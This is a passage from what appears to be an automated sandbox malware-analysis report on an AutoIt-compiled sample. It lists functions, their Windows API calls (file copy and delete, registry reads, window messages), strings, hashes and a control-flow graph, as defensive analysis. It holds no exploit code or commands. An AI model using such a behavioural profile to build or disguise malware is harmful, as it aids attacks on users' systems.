                                                                                                                      • Opcode Fuzzy Hash: 79b4cd4bfe8602805d18f7a55f6913079ee2cdbbbd14d16e8b8aac5d32298c64
                                                                                                                      • Instruction Fuzzy Hash: 26A28B79A00205CFCB64CF56C480FAEBBB6BF58314F24806ED905AB351D739AD46CB99
                                                                                                                      Function 0052445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(?,004FE398), ref: 0052446A
                                                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 0052447B
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0052448B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 48322524-0
                                                                                                                      • Opcode ID: ed33549b8299e7d52780b0fc5eb09c2b2402f7ef285455a16cd72512ac1f14c2
                                                                                                                      • Instruction ID: 0734feab64c092b15879ce81742886223b987055316e43313e8f46fd2303a8cb
                                                                                                                      • Opcode Fuzzy Hash: ed33549b8299e7d52780b0fc5eb09c2b2402f7ef285455a16cd72512ac1f14c2
                                                                                                                      • Instruction Fuzzy Hash: ADE0D83A4149106B46107B3CFC4D4EE7B5CAE17339F100B16F936C10D0E7B45904AAD5
                                                                                                                      Function 004D09D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004D0A5B
                                                                                                                      • timeGetTime.WINMM ref: 004D0D16
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004D0E53
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 004D0E61
                                                                                                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 004D0EFA
                                                                                                                      • DestroyWindow.USER32 ref: 004D0F06
                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004D0F20
                                                                                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00504E83
                                                                                                                      • TranslateMessage.USER32(?), ref: 00505C60
                                                                                                                      • DispatchMessageW.USER32(?), ref: 00505C6E
                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00505C82
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbX$pbX$pbX$pbX
                                                                                                                      • API String ID: 4212290369-1252244754
                                                                                                                      • Opcode ID: a887f76e597549013b029d9acbf5046118eb87d32ae4e966ffa436e08c178ec3
                                                                                                                      • Instruction ID: 48b5e145ad6c47187479b9bb1723dd7d025ce658558c557a99dea24b5925e683
                                                                                                                      • Opcode Fuzzy Hash: a887f76e597549013b029d9acbf5046118eb87d32ae4e966ffa436e08c178ec3
                                                                                                                      • Instruction Fuzzy Hash: BBB2BE74608741DBD724DF24C894BAFBBE4BF84304F14491EE88A972A1DB74E884DF96
                                                                                                                      Function 00529155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00528F5F: __time64.LIBCMT ref: 00528F69
                                                                                                                        • Part of subcall function 004C4EE5: _fseek.LIBCMT ref: 004C4EFD
                                                                                                                      • __wsplitpath.LIBCMT ref: 00529234
                                                                                                                        • Part of subcall function 004E40FB: __wsplitpath_helper.LIBCMT ref: 004E413B
                                                                                                                      • _wcscpy.LIBCMT ref: 00529247
                                                                                                                      • _wcscat.LIBCMT ref: 0052925A
                                                                                                                      • __wsplitpath.LIBCMT ref: 0052927F
                                                                                                                      • _wcscat.LIBCMT ref: 00529295
                                                                                                                      • _wcscat.LIBCMT ref: 005292A8
                                                                                                                        • Part of subcall function 00528FA5: _memmove.LIBCMT ref: 00528FDE
                                                                                                                        • Part of subcall function 00528FA5: _memmove.LIBCMT ref: 00528FED
                                                                                                                      • _wcscmp.LIBCMT ref: 005291EF
                                                                                                                        • Part of subcall function 00529734: _wcscmp.LIBCMT ref: 00529824
                                                                                                                        • Part of subcall function 00529734: _wcscmp.LIBCMT ref: 00529837
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00529452
                                                                                                                      • _wcsncpy.LIBCMT ref: 005294C5
                                                                                                                      • DeleteFileW.KERNEL32(?,?), ref: 005294FB
                                                                                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00529511
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00529522
                                                                                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00529534
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1500180987-0
                                                                                                                      • Opcode ID: a7a274c865b53aa292ce638e8d86f430bde7157af9414274551b602845267562
                                                                                                                      • Instruction ID: a0148b94f944d54de99a97694af58a086e2058de8edb2900ae27135b9cbd1c0c
                                                                                                                      • Opcode Fuzzy Hash: a7a274c865b53aa292ce638e8d86f430bde7157af9414274551b602845267562
                                                                                                                      • Instruction Fuzzy Hash: 26C16FB1E00129ABDF11DF95DC85EDEBBBCEF95314F0040AAF609E6281DB349A448F65
                                                                                                                      Function 004C3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72windowregistryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004C3074
                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 004C309E
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004C30AF
                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 004C30CC
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004C30DC
                                                                                                                      • LoadIconW.USER32(000000A9), ref: 004C30F2
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004C3101
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                      • Opcode ID: c47033a92d6cc45923ca9ebe57d8c6ce122c06d960798a527b24f438e97af572
                                                                                                                      • Instruction ID: 7681ca4b41290ad64442a626c998f3e5773324bda0094e6e2b307c3b46818203
                                                                                                                      • Opcode Fuzzy Hash: c47033a92d6cc45923ca9ebe57d8c6ce122c06d960798a527b24f438e97af572
                                                                                                                      • Instruction Fuzzy Hash: 49314875840345AFDB10CFA8E888ADDBFF0FF19314F24456EE581A62A0E3B90588DF51
                                                                                                                      Function 004C3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004C3074
                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 004C309E
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004C30AF
                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 004C30CC
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004C30DC
                                                                                                                      • LoadIconW.USER32(000000A9), ref: 004C30F2
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004C3101
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                      • Opcode ID: 4f77d6639a9a71f6e9439c0d0de273888303f8b47d3512be136e54620293556f
                                                                                                                      • Instruction ID: 5a5249f8a3faf85fa56553bc9af2fed7cc8cc1f0d829ede64cc88574ef7a39be
                                                                                                                      • Opcode Fuzzy Hash: 4f77d6639a9a71f6e9439c0d0de273888303f8b47d3512be136e54620293556f
                                                                                                                      • Instruction Fuzzy Hash: D321E5B9941208AFDB00DFA8E848BDDBBF4FB19704F10512AF911A62A0E7B54548AF91
                                                                                                                      Function 004C708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,005852F8,?,004C37AE,?), ref: 004C4724
                                                                                                                        • Part of subcall function 004E050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,004C7165), ref: 004E052D
                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004C71A8
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004FE8C8
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 004FE909
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004FE947
                                                                                                                      • _wcscat.LIBCMT ref: 004FE9A0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                      • API String ID: 2673923337-2727554177
                                                                                                                      • Opcode ID: 8265f5d003023977c3967ffd2a2afe4dc27c923a18fc0bbe59752c29ed7fcce1
                                                                                                                      • Instruction ID: ab8bddf71537b82fcb443046c05eb210958dc67f20a5043274071fc5469f773f
                                                                                                                      • Opcode Fuzzy Hash: 8265f5d003023977c3967ffd2a2afe4dc27c923a18fc0bbe59752c29ed7fcce1
                                                                                                                      • Instruction Fuzzy Hash: 64718B791083019EC300EF2AEC41EABBBE8FF94354F40492FF946972A0DB759948DB56
                                                                                                                      Function 004C3633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 760 4c3633-4c3681 762 4c36e1-4c36e3 760->762 763 4c3683-4c3686 760->763 762->763 766 4c36e5 762->766 764 4c3688-4c368f 763->764 765 4c36e7 763->765 767 4c374b-4c3753 PostQuitMessage 764->767 768 4c3695-4c369a 764->768 770 4c36ed-4c36f0 765->770 771 4fd0cc-4fd0fa call 4d1070 call 4d1093 765->771 769 4c36ca-4c36d2 DefWindowProcW 766->769 775 4c3711-4c3713 767->775 773 4fd154-4fd168 call 522527 768->773 774 4c36a0-4c36a2 768->774 776 4c36d8-4c36de 769->776 777 4c3715-4c373c SetTimer RegisterWindowMessageW 770->777 778 4c36f2-4c36f3 770->778 805 4fd0ff-4fd106 771->805 773->775 798 4fd16e 773->798 780 4c36a8-4c36ad 774->780 781 4c3755-4c375f call 4c44a0 774->781 775->776 777->775 782 4c373e-4c3749 CreatePopupMenu 777->782 784 4fd06f-4fd072 778->784 785 4c36f9-4c370c KillTimer call 4c443a call 4c3114 778->785 787 4fd139-4fd140 780->787 788 4c36b3-4c36b8 780->788 799 4c3764 781->799 782->775 791 4fd0a8-4fd0c7 MoveWindow 784->791 792 4fd074-4fd076 784->792 785->775 787->769 794 4fd146-4fd14f call 517c36 787->794 796 4c36be-4c36c4 788->796 797 4fd124-4fd134 call 522d36 788->797 791->775 800 4fd078-4fd07b 792->800 801 4fd097-4fd0a3 SetFocus 792->801 794->769 796->769 796->805 797->775 798->769 799->775 800->796 806 4fd081-4fd092 call 4d1070 800->806 801->775 805->769 809 4fd10c-4fd11f call 4c443a call 4c434a 805->809 806->775 809->769
                                                                                                                      APIs
                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 004C36D2
                                                                                                                      • KillTimer.USER32(?,00000001), ref: 004C36FC
                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004C371F
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004C372A
                                                                                                                      • CreatePopupMenu.USER32 ref: 004C373E
                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 004C374D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                      • String ID: TaskbarCreated$%U
                                                                                                                      • API String ID: 129472671-1396545613
                                                                                                                      • Opcode ID: d4641753af434671429807bcbb1cba3a74a59a5850a49197b9efbf1dbeed4b8e
                                                                                                                      • Instruction ID: 7c057e4653296df558a217338552b9fc491af6e07b17acdc667f8032772c2cc8
                                                                                                                      • Opcode Fuzzy Hash: d4641753af434671429807bcbb1cba3a74a59a5850a49197b9efbf1dbeed4b8e
                                                                                                                      • Instruction Fuzzy Hash: E3412C7D200505BBDB646F68EC09F7A3B95EB11306F10812FF902A63A1DA6C5D05A76E
                                                                                                                      Function 004C3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004C3A50
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004C3A5F
                                                                                                                      • LoadIconW.USER32(00000063), ref: 004C3A76
                                                                                                                      • LoadIconW.USER32(000000A4), ref: 004C3A88
                                                                                                                      • LoadIconW.USER32(000000A2), ref: 004C3A9A
                                                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 004C3AC0
                                                                                                                      • RegisterClassExW.USER32(?), ref: 004C3B16
                                                                                                                        • Part of subcall function 004C3041: GetSysColorBrush.USER32(0000000F), ref: 004C3074
                                                                                                                        • Part of subcall function 004C3041: RegisterClassExW.USER32(00000030), ref: 004C309E
                                                                                                                        • Part of subcall function 004C3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004C30AF
                                                                                                                        • Part of subcall function 004C3041: InitCommonControlsEx.COMCTL32(?), ref: 004C30CC
                                                                                                                        • Part of subcall function 004C3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004C30DC
                                                                                                                        • Part of subcall function 004C3041: LoadIconW.USER32(000000A9), ref: 004C30F2
                                                                                                                        • Part of subcall function 004C3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004C3101
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                      • API String ID: 423443420-4155596026
                                                                                                                      • Opcode ID: 7d33a2882625e17d1e00052a2483abfb1df8e837bdfa57be00ac4c03c3b18bff
                                                                                                                      • Instruction ID: 4d6f6a1e0b397f47680857f1e89f10265621de139caafb1974620c5b870f61f0
                                                                                                                      • Opcode Fuzzy Hash: 7d33a2882625e17d1e00052a2483abfb1df8e837bdfa57be00ac4c03c3b18bff
                                                                                                                      • Instruction Fuzzy Hash: 67214F79D00304AFEB10DFA4EC49B9D7BB0FB18715F00511AE901B62A1E7B95958AF84
                                                                                                                      Function 004C3766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RX
                                                                                                                      • API String ID: 1825951767-4033668682
                                                                                                                      • Opcode ID: 710ada920dd1b7db84c2dc0d46f93b3f4a0e49131a02199016c38431c58bc9d9
                                                                                                                      • Instruction ID: d5d15dd0f9d821fe23c44155a279d6fb360f25ec3405a48e0828468de1854754
                                                                                                                      • Opcode Fuzzy Hash: 710ada920dd1b7db84c2dc0d46f93b3f4a0e49131a02199016c38431c58bc9d9
                                                                                                                      • Instruction Fuzzy Hash: 51A15C7990021D9ACB44EFA6DC55EEEB779BF14308F00442EF416B7191EF786A08CB68
                                                                                                                      Function 004CF76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004E0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 004E0193
                                                                                                                        • Part of subcall function 004E0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 004E019B
                                                                                                                        • Part of subcall function 004E0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004E01A6
                                                                                                                        • Part of subcall function 004E0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004E01B1
                                                                                                                        • Part of subcall function 004E0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004E01B9
                                                                                                                        • Part of subcall function 004E0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004E01C1
                                                                                                                        • Part of subcall function 004D60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,004CF930), ref: 004D6154
                                                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004CF9CD
                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004CFA4A
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 005045C8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                      • String ID: <WX$\TX$%U$SX
                                                                                                                      • API String ID: 1986988660-1343472353
                                                                                                                      • Opcode ID: c0b2715454ad1be72b130be551be7d2ebcd78459f67927d899c650f79c0e780c
                                                                                                                      • Instruction ID: d66d85b3c486af25e2950621e1193f016a6be513b3ec758fcdfdc1efa2158f3c
                                                                                                                      • Opcode Fuzzy Hash: c0b2715454ad1be72b130be551be7d2ebcd78459f67927d899c650f79c0e780c
                                                                                                                      • Instruction Fuzzy Hash: F781C1B4901A40CFCB84EF39A8506197FE5FB68346750A52EAC19EB372FB74048CAF15
                                                                                                                      Function 01108460 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
